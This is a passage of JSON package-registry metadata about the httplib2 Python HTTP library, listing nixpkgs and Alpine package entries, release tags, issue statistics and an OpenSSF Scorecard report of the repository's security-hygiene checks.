5","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:58:22.720Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python310Packages.httplib2?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4331,"html_url":null,"role":null,"created_at":"2026-03-08T09:47:22.326Z","updated_at":"2026-03-08T09:47:22.326Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3095},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-08-25T05:04:39.690Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":6062997,"name":"py2-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python2)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-05-05T17:04:34.000Z","latest_release_published_at":"2019-05-05T17:04:34.000Z","latest_release_number":"0.12.1-r1","last_synced_at":"2026-03-08T18:56:31.683Z","created_at":"2023-01-31T19:11:45.460Z","updated_at":"2026-08-21T14:58:22.742Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.10/main/x86_64/py2-httplib2","install_command":"apk add py2-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag